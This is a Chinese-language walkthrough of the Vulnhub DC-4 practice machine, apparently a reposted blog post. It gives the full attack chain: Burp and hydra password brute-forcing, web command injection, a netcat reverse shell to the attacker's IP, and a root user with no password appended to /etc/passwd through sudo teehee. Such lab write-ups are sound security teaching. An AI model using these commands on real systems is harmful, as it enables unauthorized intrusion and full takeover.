DC-4靶机解题思路

说明：Vulnhub是一个渗透测试实战网站，提供了许多带有漏洞的渗透测试靶机下载。适合初学者学习，实践。DC-4全程只有一个falg，获取root权限，以下内容是自身复现的过程，总结记录下来，如有不足请多多指教。

下载地址：

Download (Mirror): 

https://download.vulnhub.com/dc/DC-4.zip

目标机IP地址：192.168.16.142
攻击机kali IP地址：192.168.16.138

arp-scan -l

端口扫描

nmap -sV -p- 192.168.16.142     开放了80与22。

访问80端口。

根据提示页面提示可以使用admin用户登陆，尝试对它进行爆破，使用burp中的Intuder模块。

爆破后发现密码为happy时，响应正文的长度较长，使用happy尝试登陆一下。

登陆成功用户名admin，密码happy。

随意点一点，点击Command以后run一下发现可以执行命令。

使用burp进行抓包，结合Repeater对数据包进行重放尝试执行其他命令。执行成功。

尝试反弹shell，首先攻击机监听7777端口，等待 .......

nc -e /bin/bash 192.168.16.138 7777

反弹成功。

python -c 'import pty;pty.spawn("/bin/bash")'   转换交互式shell，对目录文件进行检查，查看用户 cat /etc/passwd。

进入这几个用户的家目录进行信息收集。jim用户发现了一个关于密码的文件，

/home/jim/backups/old-passwords.bak 将文件进行保存。无权查看mbox文件。查看test.sh未发现有用信息。

ssh爆破刚刚在jim用户里发现了一个关于密码的文件，使用hydra进行爆破

hydra -l jim -P dc4pass.txt ssh://192.168.16.142 

爆出密码后进行登录 ssh  [email protected]

打开mbox 是来自root的一封邮件大致的内容是这是一个测试。

进入邮件服务目录查看邮件发现了一封由charles发给jim的密码邮件。

cat /var/mail/jim

切换用户charles/^xHhA&hvim0y。

sudo -l :列出目前用户可执行与无法执行的指令。

发现teehee命令无需root用户密码即可以root权限执行。 

查看teehee命令的作用。

teehee：输入输出文件。这里使用-a 选项 追加不覆盖。

使用teehee -a 创建一个用户拥有root权限的用户。

参照/etc/passwd 。

root:x:0:0:root:/root:/bin/bash

echo dc41::0:0:::/bin/bash | sudo teehee -a /etc/passwd

进入root用户家目录发现flag成功夺旗。

免责声明：本站提供安全工具、程序(方法)可能带有攻击性，仅供安全研究与教学之用，风险自负!

转载声明：著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。

订阅查看更多复现文章、学习笔记

thelostworld

安全路上，与你并肩前行！！！！

个人知乎：https://www.zhihu.com/people/fu-wei-43-69/columns

个人简书：https://www.jianshu.com/u/bf0e38a8d400

个人CSDN：https://blog.csdn.net/qq_37602797/category_10169006.html

本文始发于微信公众号（thelostworld）：DC-4靶机解题思路